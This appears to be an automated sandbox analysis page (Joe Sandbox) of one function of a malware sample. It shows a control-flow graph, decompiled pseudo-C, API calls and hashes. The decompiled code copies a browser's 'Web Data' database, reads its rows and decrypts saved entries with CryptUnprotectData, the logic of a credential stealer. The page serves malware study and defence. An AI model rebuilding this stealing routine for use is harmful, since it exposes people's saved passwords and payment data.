                                                                                                                                                                        control_flow_graph 943 403236-4032be call 4017fa call 401934 952 4032c0-4032c3 LocalFree 943->952 953 4032c9-4032e5 CryptUnprotectData 943->953 952->953 954 4032e7-4032fb call 40177f 953->954 955 403309-40330d 953->955 954->955 962 4032fd-403307 954->962 957 403318-40331c 955->957 958 40330f-403312 LocalFree 955->958 960 403327-40332b 957->960 961 40331e-403321 LocalFree 957->961 958->957 963 403336-403338 960->963 964 40332d-403330 LocalFree 960->964 961->960 962->955 965 403341-403343 963->965 966 40333a-40333b LocalFree 963->966 964->963 967 403345-403346 LocalFree 965->967 968 40334c-403351 965->968 966->965 967->968 970 403357-403431 call 40a69e 968->970 971 40373f 968->971 986 403746-40375e LocalFree DeleteFileW LocalFree 970->986 987 403437-403445 CopyFileW 970->987 972 403741-403745 971->972 986->972 987->986 988 40344b-40345a 987->988 990 403461-403465 988->990 991 40345c-40345f 988->991 993 403467-403469 990->993 994 40347f-40349b 990->994 992 40346a-40347a LocalFree * 2 991->992 992->972 993->992 996 4034bd-4034ca 994->996 997 40349d-4034b8 LocalFree * 2 994->997 1000 4034d0-4034d5 996->1000 1001 40370e-403710 996->1001 997->972 1004 4034d6-40351f 1000->1004 1002 403712-403713 LocalFree 1001->1002 1003 403719-403736 DeleteFileW 1001->1003 1002->1003 1003->971 1009 403738-403739 LocalFree 1003->1009 1013 4036f5-403702 1004->1013 1014 403525-403533 1004->1014 1009->971 1013->1004 1017 403708-40370b 1013->1017 1014->1013 1018 403539-403548 1014->1018 1017->1001 1018->1013 1020 40354e-40355d 1018->1020 1020->1013 1022 403563-4035a3 1020->1022 1026 4035a9-4035d7 1022->1026 1027 4036eb-4036f4 LocalFree 1022->1027 1030 403655-403677 1026->1030 1031 4035d9-4035fd call 40177f 1026->1031 1027->1013 1035 403679-4036b6 call 40a4c2 lstrlenW 1030->1035 1036 4036da 1030->1036 1041 40363a 1031->1041 1042 4035ff-40362b lstrlenW 1031->1042 1049 4036c3-4036c7 1035->1049 1050 4036b8-4036c1 call 40a503 1035->1050 1039 4036dd-4036df 1036->1039 1043 4036e1-4036e2 LocalFree 1039->1043 1044 4036e8 1039->1044 1045 40363d-403641 1041->1045 1042->1045 1051 40362d-403638 call 40a503 1042->1051 1043->1044 1044->1027 1045->1039 1048 403647 1045->1048 1052 40364a-403650 LocalFree 1048->1052 1055 4036d2-4036d5 1049->1055 1056 4036c9-4036cc LocalFree 1049->1056 1050->1049 1051->1045 1052->1039 1055->1052 1056->1055
                                                                                                                                                                        C-Code - Quality: 18%
                                                                                                                                                                        			E00403236(intOrPtr* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				char _v9;
                                                                                                                                                                        				char _v10;
                                                                                                                                                                        				char _v11;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				WCHAR* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				intOrPtr* _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				void* _v60;
                                                                                                                                                                        				void* _v64;
                                                                                                                                                                        				char _v68;
                                                                                                                                                                        				void* _v72;
                                                                                                                                                                        				char _v76;
                                                                                                                                                                        				void* _v80;
                                                                                                                                                                        				char _v84;
                                                                                                                                                                        				intOrPtr _v88;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				void* _t108;
                                                                                                                                                                        				void* _t119;
                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                        				intOrPtr _t124;
                                                                                                                                                                        				intOrPtr _t126;
                                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                                        				intOrPtr _t130;
                                                                                                                                                                        				intOrPtr _t132;
                                                                                                                                                                        				intOrPtr _t134;
                                                                                                                                                                        				void* _t138;
                                                                                                                                                                        				void* _t139;
                                                                                                                                                                        				void* _t141;
                                                                                                                                                                        				int _t146;
                                                                                                                                                                        				void* _t148;
                                                                                                                                                                        				void* _t150;
                                                                                                                                                                        				intOrPtr _t157;
                                                                                                                                                                        				intOrPtr _t158;
                                                                                                                                                                        				intOrPtr _t159;
                                                                                                                                                                        				signed int _t160;
                                                                                                                                                                        				void* _t161;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				void* _t168;
                                                                                                                                                                        				WCHAR* _t172;
                                                                                                                                                                        				signed int _t179;
                                                                                                                                                                        				void* _t180;
                                                                                                                                                                        				int _t181;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				int _t191;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        				void* _t205;
                                                                                                                                                                        				intOrPtr* _t209;
                                                                                                                                                                        				void* _t210;
                                                                                                                                                                        				intOrPtr* _t211;
                                                                                                                                                                        				void* _t265;
                                                                                                                                                                        				void* _t268;
                                                                                                                                                                        				intOrPtr _t269;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        				void* _t274;
                                                                                                                                                                        				void* _t275;
                                                                                                                                                                        				char _t276;
                                                                                                                                                                        				void* _t278;
                                                                                                                                                                        				signed int _t279;
                                                                                                                                                                        				signed int _t280;
                                                                                                                                                                        				void* _t281;
                                                                                                                                                                        				intOrPtr* _t284;
                                                                                                                                                                        				void* _t285;
                                                                                                                                                                        
                                                                                                                                                                        				_t209 = __edx;
                                                                                                                                                                        				_v48 = __ecx;
                                                                                                                                                                        				_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_t108 =  *((intOrPtr*)( *0x40e13c))(_t107, _a12);
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t265 = _t108;
                                                                                                                                                                        				E004017FA(_t265,  &_v8,  &_v56);
                                                                                                                                                                        				 *_t284 = 0x200;
                                                                                                                                                                        				_t274 =  *((intOrPtr*)( *0x40e044))(0x40);
                                                                                                                                                                        				_v52 = _t274;
                                                                                                                                                                        				E00401934(_v8,  &_v52,  *0x40e044, _v56);
                                                                                                                                                                        				_v28 = _v28 & 0x00000000;
                                                                                                                                                                        				_v64 = _t274;
                                                                                                                                                                        				_v68 = 0x200;
                                                                                                                                                                        				_t275 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_v24 = _t275;
                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t119 =  *((intOrPtr*)( *0x40e0b0))( &_v68,  &_v28, 0, 0, 0, 0,  &_v76); // executed
                                                                                                                                                                        				if(_t119 != 0) {
                                                                                                                                                                        					_t205 = E0040177F(_v72,  &_v24, _v76);
                                                                                                                                                                        					_t275 = _v24;
                                                                                                                                                                        					if(_t205 != 0) {
                                                                                                                                                                        						 *_t209 =  *((intOrPtr*)( *0x40e13c))( *_t209, _t275);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v28 != 0) {
                                                                                                                                                                        					LocalFree(_v28);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v64 != 0) {
                                                                                                                                                                        					LocalFree(_v64);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v72 != 0) {
                                                                                                                                                                        					LocalFree(_v72);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t275 != 0) {
                                                                                                                                                                        					LocalFree(_t275);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t265 != 0) {
                                                                                                                                                                        					LocalFree(_t265);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t276 = _a16;
                                                                                                                                                                        				if(_t276 == 0) {
                                                                                                                                                                        					L57:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t122 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1c4);
                                                                                                                                                                        					 *0x40e4d4 = _t122;
                                                                                                                                                                        					_t124 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1f8);
                                                                                                                                                                        					 *0x40e4c8 = _t124;
                                                                                                                                                                        					_t126 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1e0);
                                                                                                                                                                        					 *0x40e4bc = _t126;
                                                                                                                                                                        					_t128 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e208);
                                                                                                                                                                        					 *0x40e4c4 = _t128;
                                                                                                                                                                        					_t130 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e230);
                                                                                                                                                                        					 *0x40e4cc = _t130;
                                                                                                                                                                        					_t132 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1c0);
                                                                                                                                                                        					 *0x40e4b8 = _t132;
                                                                                                                                                                        					_t134 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e224);
                                                                                                                                                                        					 *0x40e4c0 = _t134;
                                                                                                                                                                        					 *0x40e4d0 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1b0);
                                                                                                                                                                        					_t138 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					_t139 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					_v32 = _t139;
                                                                                                                                                                        					_t278 =  *((intOrPtr*)( *0x40e000))(_t138, _a8, L"Web Data");
                                                                                                                                                                        					_v60 = _t278;
                                                                                                                                                                        					_t141 = E0040A69E( *0x40e000,  &_v32);
                                                                                                                                                                        					_t210 = _v32;
                                                                                                                                                                        					if(_t141 == 0) {
                                                                                                                                                                        						L59:
                                                                                                                                                                        						LocalFree(_t278);
                                                                                                                                                                        						DeleteFileW(_t210);
                                                                                                                                                                        						return LocalFree(_t210) | 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t146 = CopyFileW(_t278, _t210, 0); // executed
                                                                                                                                                                        					if(_t146 == 0) {
                                                                                                                                                                        						goto L59;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t148 =  *0x40e4c8(_t210,  &_v24); // executed
                                                                                                                                                                        					if(_t148 == 0) {
                                                                                                                                                                        						if(_v24 != 0) {
                                                                                                                                                                        							_t150 =  *0x40e4d4(_v24,  *0x40e1d4, 0xffffffff,  &_a16, 0); // executed
                                                                                                                                                                        							_t285 = _t284 + 0x14;
                                                                                                                                                                        							if(_t150 == 0) {
                                                                                                                                                                        								_push(_a16);
                                                                                                                                                                        								if( *0x40e4cc() != 0x64) {
                                                                                                                                                                        									L53:
                                                                                                                                                                        									if(_t278 != 0) {
                                                                                                                                                                        										LocalFree(_t278);
                                                                                                                                                                        									}
                                                                                                                                                                        									 *0x40e4bc(_a16);
                                                                                                                                                                        									 *0x40e4c4(_v24); // executed
                                                                                                                                                                        									DeleteFileW(_t210); // executed
                                                                                                                                                                        									if(_t210 != 0) {
                                                                                                                                                                        										LocalFree(_t210);
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L57;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t211 = _v48;
                                                                                                                                                                        								_t268 = 1;
                                                                                                                                                                        								do {
                                                                                                                                                                        									_t157 =  *0x40e4b8(_a16, 0);
                                                                                                                                                                        									_v48 = _t157;
                                                                                                                                                                        									_t158 =  *0x40e4b8(_a16, 2);
                                                                                                                                                                        									_v44 = _t158;
                                                                                                                                                                        									_t159 =  *0x40e4b8(_a16, 3);
                                                                                                                                                                        									_v40 = _t159;
                                                                                                                                                                        									_t160 =  *0x40e4c0(_a16, _t268);
                                                                                                                                                                        									_t279 = _t160;
                                                                                                                                                                        									_v36 = _t279;
                                                                                                                                                                        									_t161 =  *0x40e4c0(_a16, 0);
                                                                                                                                                                        									_t285 = _t285 + 0x28;
                                                                                                                                                                        									if(_t161 < _t268) {
                                                                                                                                                                        										goto L51;
                                                                                                                                                                        									}
                                                                                                                                                                        									_push(_t268);
                                                                                                                                                                        									_push(_a16);
                                                                                                                                                                        									if( *0x40e4c0() < _t268) {
                                                                                                                                                                        										goto L51;
                                                                                                                                                                        									}
                                                                                                                                                                        									_push(2);
                                                                                                                                                                        									_push(_a16);
                                                                                                                                                                        									if( *0x40e4c0() < _t268) {
                                                                                                                                                                        										goto L51;
                                                                                                                                                                        									}
                                                                                                                                                                        									_push(3);
                                                                                                                                                                        									_push(_a16);
                                                                                                                                                                        									if( *0x40e4c0() < _t268) {
                                                                                                                                                                        										goto L51;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t269 =  *0x40e4d0(_a16, _t268);
                                                                                                                                                                        									_t57 = _t279 + 0x40; // 0x40
                                                                                                                                                                        									_t167 =  *((intOrPtr*)( *0x40e044))(0x40, _t57);
                                                                                                                                                                        									_t168 =  *((intOrPtr*)( *0x40e050))(_t167, _t269);
                                                                                                                                                                        									_v52 = _t168;
                                                                                                                                                                        									_v12 =  *_t168;
                                                                                                                                                                        									_v11 =  *((intOrPtr*)(_t168 + 1));
                                                                                                                                                                        									_v10 =  *((intOrPtr*)(_t168 + 2));
                                                                                                                                                                        									_v9 = 0;
                                                                                                                                                                        									if(_t269 == 0) {
                                                                                                                                                                        										L50:
                                                                                                                                                                        										LocalFree(_t168);
                                                                                                                                                                        										_t268 = 1;
                                                                                                                                                                        										goto L51;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t280 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
                                                                                                                                                                        									_t172 =  *0x40e1c8; // 0x6ee550
                                                                                                                                                                        									_v20 = _t172;
                                                                                                                                                                        									_push("v10");
                                                                                                                                                                        									_push( &_v12);
                                                                                                                                                                        									_v8 = _t280;
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e084))() != 0) {
                                                                                                                                                                        										_push( &_v84);
                                                                                                                                                                        										_v88 = _t269;
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_v92 = 0x200;
                                                                                                                                                                        										_push( &_v92);
                                                                                                                                                                        										if( *((intOrPtr*)( *0x40e0b0))() == 0) {
                                                                                                                                                                        											_t281 = _v8;
                                                                                                                                                                        											L47:
                                                                                                                                                                        											if(_t281 != 0) {
                                                                                                                                                                        												LocalFree(_t281);
                                                                                                                                                                        											}
                                                                                                                                                                        											_t168 = _v52;
                                                                                                                                                                        											goto L50;
                                                                                                                                                                        										}
                                                                                                                                                                        										 *((char*)(_v84 + _v80)) = 0;
                                                                                                                                                                        										_t179 = E0040A4C2(_v80);
                                                                                                                                                                        										_v36 = _t179;
                                                                                                                                                                        										_t180 =  *((intOrPtr*)( *0x40e0ec))(_t280, _v20, _t179, _v48, _v44, _v40);
                                                                                                                                                                        										_t285 = _t285 + 0x18;
                                                                                                                                                                        										_t181 = lstrlenW(_v20);
                                                                                                                                                                        										_t281 = _v8;
                                                                                                                                                                        										if(_t180 >= _t181) {
                                                                                                                                                                        											 *_t211 = E0040A503( *_t211, _t281);
                                                                                                                                                                        										}
                                                                                                                                                                        										if(_v80 != 0) {
                                                                                                                                                                        											LocalFree(_v80);
                                                                                                                                                                        										}
                                                                                                                                                                        										LocalFree(_v36);
                                                                                                                                                                        										L39:
                                                                                                                                                                        										goto L47;
                                                                                                                                                                        									}
                                                                                                                                                                        									_v16 =  *((intOrPtr*)( *0x40e044))(0x40, _v36 << 2);
                                                                                                                                                                        									if(E0040177F(_t269,  &_v16, _v36) == 0) {
                                                                                                                                                                        										_t281 = _v8;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t190 =  *((intOrPtr*)( *0x40e0ec))(_t280, _v20, _v16, _v48, _v44, _v40);
                                                                                                                                                                        										_t285 = _t285 + 0x18;
                                                                                                                                                                        										_t191 = lstrlenW(_v20);
                                                                                                                                                                        										_t281 = _v8;
                                                                                                                                                                        										if(_t190 >= _t191) {
                                                                                                                                                                        											 *_t211 = E0040A503( *_t211, _t281);
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									if(_v16 == 0) {
                                                                                                                                                                        										goto L47;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										LocalFree(_v16);
                                                                                                                                                                        										goto L39;
                                                                                                                                                                        									}
                                                                                                                                                                        									L51:
                                                                                                                                                                        									_push(_a16);
                                                                                                                                                                        								} while ( *0x40e4cc() == 0x64);
                                                                                                                                                                        								_t210 = _v32;
                                                                                                                                                                        								_t278 = _v60;
                                                                                                                                                                        								goto L53;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t278);
                                                                                                                                                                        							LocalFree(_t210);
                                                                                                                                                                        							 *0x40e4c4(_v24);
                                                                                                                                                                        							_t196 = 0xfffffffd;
                                                                                                                                                                        							return _t196;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t273 = 0xfffffffe;
                                                                                                                                                                        						L22:
                                                                                                                                                                        						LocalFree(_t278);
                                                                                                                                                                        						LocalFree(_t210);
                                                                                                                                                                        						return _t273;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t273 = 0xffffffffffffffff;
                                                                                                                                                                        					goto L22;
                                                                                                                                                                        				}
                                                                                                                                                                        			}











































































                                                                                                                                                                        0x0040324b
                                                                                                                                                                        0x0040324d
                                                                                                                                                                        0x00403250
                                                                                                                                                                        0x0040325c
                                                                                                                                                                        0x0040325e
                                                                                                                                                                        0x00403265
                                                                                                                                                                        0x0040326d
                                                                                                                                                                        0x00403278
                                                                                                                                                                        0x00403286
                                                                                                                                                                        0x0040328f
                                                                                                                                                                        0x00403292
                                                                                                                                                                        0x0040329c
                                                                                                                                                                        0x004032a9
                                                                                                                                                                        0x004032ac
                                                                                                                                                                        0x004032b9
                                                                                                                                                                        0x004032bb
                                                                                                                                                                        0x004032be
                                                                                                                                                                        0x004032c3
                                                                                                                                                                        0x004032c3
                                                                                                                                                                        0x004032e1
                                                                                                                                                                        0x004032e5
                                                                                                                                                                        0x004032f0
                                                                                                                                                                        0x004032f5
                                                                                                                                                                        0x004032fb
                                                                                                                                                                        0x00403307
                                                                                                                                                                        0x00403307
                                                                                                                                                                        0x004032fb
                                                                                                                                                                        0x0040330d
                                                                                                                                                                        0x00403312
                                                                                                                                                                        0x00403312
                                                                                                                                                                        0x0040331c
                                                                                                                                                                        0x00403321
                                                                                                                                                                        0x00403321
                                                                                                                                                                        0x0040332b
                                                                                                                                                                        0x00403330
                                                                                                                                                                        0x00403330
                                                                                                                                                                        0x00403338
                                                                                                                                                                        0x0040333b
                                                                                                                                                                        0x0040333b
                                                                                                                                                                        0x00403343
                                                                                                                                                                        0x00403346
                                                                                                                                                                        0x00403346
                                                                                                                                                                        0x0040334c
                                                                                                                                                                        0x00403351
                                                                                                                                                                        0x0040373f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403357
                                                                                                                                                                        0x00403363
                                                                                                                                                                        0x0040336b
                                                                                                                                                                        0x00403376
                                                                                                                                                                        0x0040337e
                                                                                                                                                                        0x00403389
                                                                                                                                                                        0x00403391
                                                                                                                                                                        0x0040339c
                                                                                                                                                                        0x004033a4
                                                                                                                                                                        0x004033af
                                                                                                                                                                        0x004033b7
                                                                                                                                                                        0x004033c2
                                                                                                                                                                        0x004033ca
                                                                                                                                                                        0x004033d5
                                                                                                                                                                        0x004033dd
                                                                                                                                                                        0x004033ef
                                                                                                                                                                        0x004033fc
                                                                                                                                                                        0x00403409
                                                                                                                                                                        0x00403419
                                                                                                                                                                        0x0040341f
                                                                                                                                                                        0x00403424
                                                                                                                                                                        0x00403427
                                                                                                                                                                        0x0040342c
                                                                                                                                                                        0x00403431
                                                                                                                                                                        0x00403746
                                                                                                                                                                        0x00403747
                                                                                                                                                                        0x0040374e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040375b
                                                                                                                                                                        0x00403441
                                                                                                                                                                        0x00403445
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403450
                                                                                                                                                                        0x0040345a
                                                                                                                                                                        0x00403465
                                                                                                                                                                        0x00403490
                                                                                                                                                                        0x00403496
                                                                                                                                                                        0x0040349b
                                                                                                                                                                        0x004034bd
                                                                                                                                                                        0x004034ca
                                                                                                                                                                        0x0040370e
                                                                                                                                                                        0x00403710
                                                                                                                                                                        0x00403713
                                                                                                                                                                        0x00403713
                                                                                                                                                                        0x0040371c
                                                                                                                                                                        0x00403725
                                                                                                                                                                        0x0040372e
                                                                                                                                                                        0x00403736
                                                                                                                                                                        0x00403739
                                                                                                                                                                        0x00403739
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403736
                                                                                                                                                                        0x004034d0
                                                                                                                                                                        0x004034d5
                                                                                                                                                                        0x004034d6
                                                                                                                                                                        0x004034db
                                                                                                                                                                        0x004034e6
                                                                                                                                                                        0x004034e9
                                                                                                                                                                        0x004034f4
                                                                                                                                                                        0x004034f7
                                                                                                                                                                        0x00403501
                                                                                                                                                                        0x00403504
                                                                                                                                                                        0x0040350f
                                                                                                                                                                        0x00403511
                                                                                                                                                                        0x00403514
                                                                                                                                                                        0x0040351a
                                                                                                                                                                        0x0040351f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403525
                                                                                                                                                                        0x00403526
                                                                                                                                                                        0x00403533
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403539
                                                                                                                                                                        0x0040353b
                                                                                                                                                                        0x00403548
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040354e
                                                                                                                                                                        0x00403550
                                                                                                                                                                        0x0040355d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403573
                                                                                                                                                                        0x00403577
                                                                                                                                                                        0x0040357d
                                                                                                                                                                        0x00403587
                                                                                                                                                                        0x00403589
                                                                                                                                                                        0x0040358e
                                                                                                                                                                        0x00403594
                                                                                                                                                                        0x0040359a
                                                                                                                                                                        0x0040359d
                                                                                                                                                                        0x004035a3
                                                                                                                                                                        0x004036eb
                                                                                                                                                                        0x004036ec
                                                                                                                                                                        0x004036f4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004036f4
                                                                                                                                                                        0x004035bd
                                                                                                                                                                        0x004035bf
                                                                                                                                                                        0x004035c4
                                                                                                                                                                        0x004035ca
                                                                                                                                                                        0x004035cf
                                                                                                                                                                        0x004035d0
                                                                                                                                                                        0x004035d7
                                                                                                                                                                        0x0040365d
                                                                                                                                                                        0x00403660
                                                                                                                                                                        0x00403663
                                                                                                                                                                        0x00403664
                                                                                                                                                                        0x00403665
                                                                                                                                                                        0x00403666
                                                                                                                                                                        0x00403667
                                                                                                                                                                        0x0040366b
                                                                                                                                                                        0x00403672
                                                                                                                                                                        0x00403677
                                                                                                                                                                        0x004036da
                                                                                                                                                                        0x004036dd
                                                                                                                                                                        0x004036df
                                                                                                                                                                        0x004036e2
                                                                                                                                                                        0x004036e2
                                                                                                                                                                        0x004036e8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004036e8
                                                                                                                                                                        0x0040367f
                                                                                                                                                                        0x00403683
                                                                                                                                                                        0x0040369d
                                                                                                                                                                        0x004036a5
                                                                                                                                                                        0x004036a7
                                                                                                                                                                        0x004036af
                                                                                                                                                                        0x004036b3
                                                                                                                                                                        0x004036b6
                                                                                                                                                                        0x004036c1
                                                                                                                                                                        0x004036c1
                                                                                                                                                                        0x004036c7
                                                                                                                                                                        0x004036cc
                                                                                                                                                                        0x004036cc
                                                                                                                                                                        0x0040364a
                                                                                                                                                                        0x0040364a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040364a
                                                                                                                                                                        0x004035f0
                                                                                                                                                                        0x004035fd
                                                                                                                                                                        0x0040363a
                                                                                                                                                                        0x004035ff
                                                                                                                                                                        0x0040361a
                                                                                                                                                                        0x0040361c
                                                                                                                                                                        0x00403624
                                                                                                                                                                        0x00403628
                                                                                                                                                                        0x0040362b
                                                                                                                                                                        0x00403636
                                                                                                                                                                        0x00403636
                                                                                                                                                                        0x0040362b
                                                                                                                                                                        0x00403641
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403647
                                                                                                                                                                        0x0040364a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040364a
                                                                                                                                                                        0x004036f5
                                                                                                                                                                        0x004036f5
                                                                                                                                                                        0x004036ff
                                                                                                                                                                        0x00403708
                                                                                                                                                                        0x0040370b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040370b
                                                                                                                                                                        0x0040349e
                                                                                                                                                                        0x004034a5
                                                                                                                                                                        0x004034ae
                                                                                                                                                                        0x004034b7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034b7
                                                                                                                                                                        0x00403469
                                                                                                                                                                        0x0040346a
                                                                                                                                                                        0x0040346b
                                                                                                                                                                        0x00403472
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403478
                                                                                                                                                                        0x0040345c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040345c

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004032C3
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 004032E1
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403312
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403321
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403330
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040333B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403346
                                                                                                                                                                        • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00403441
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040346B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403472
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040349E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004034A5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00403747
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0040374E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00403755
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$File$CopyCryptDataDeleteUnprotect
                                                                                                                                                                        • String ID: Pn$Web Data$v10
                                                                                                                                                                        • API String ID: 1742448742-2158101865
                                                                                                                                                                        • Opcode ID: 452dee4c139b824143a0166505d536948669178c0ee45589a4d705fb7e9a228e
                                                                                                                                                                        • Instruction ID: 7d7504f3382372b0d825977313a65c8cc92f857bae52c0927fac6ea5572d7f51
                                                                                                                                                                        • Opcode Fuzzy Hash: 452dee4c139b824143a0166505d536948669178c0ee45589a4d705fb7e9a228e
                                                                                                                                                                        • Instruction Fuzzy Hash: 1FF1A171900214EFDB15DFA6EE44AAE7BB9FB08311F104835F511B72A0DB759E20CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
